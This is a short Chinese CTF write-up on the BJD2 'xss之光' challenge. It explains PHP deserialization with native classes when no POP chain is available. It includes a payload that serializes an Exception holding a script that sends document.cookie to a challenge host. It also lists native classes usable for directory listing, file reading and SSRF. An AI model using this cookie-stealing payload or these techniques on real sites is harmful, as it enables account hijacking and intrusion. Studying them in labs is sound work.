php原生类反序列化

在BJD2 xss之光，遇到了反序列化但没有pop链的情况

学习到了利用php原生类进行反序列化---

先复现......

源码泄露

 之前学习反序列化看一些师傅blog提到过，这也是第一次遇到

题目提示了XSS   原生类中  Error 和 Exception类 会造成XSS  但是Error只适于php7下造成xss，Exception php5和php7都适用

payload:

<?php
$a = new Exception("<script>window.location.href='http://3eb80a43-8890-4e07-ae79-ccfc405197c2.node3.buuoj.cn'+document.cookie</script>");
echo serialize($a);
?>

参考杨师傅的blog  http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%8E%9F%E7%94%9F%E7%B1%BB/

里面还提到了   

SimpleXMLElement  ：：用于做一个xml的对象

GlobIterator   遍历目录   可以配合SimpleXMLElement进行读取

soapclient    ssrf   配合  crlf

 我自己还搜了搜：

DirectoryIterator

FilesystemIterator   也可以造成目录遍历

SplFileObject     读取文件

学习链接：https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html#_label1_0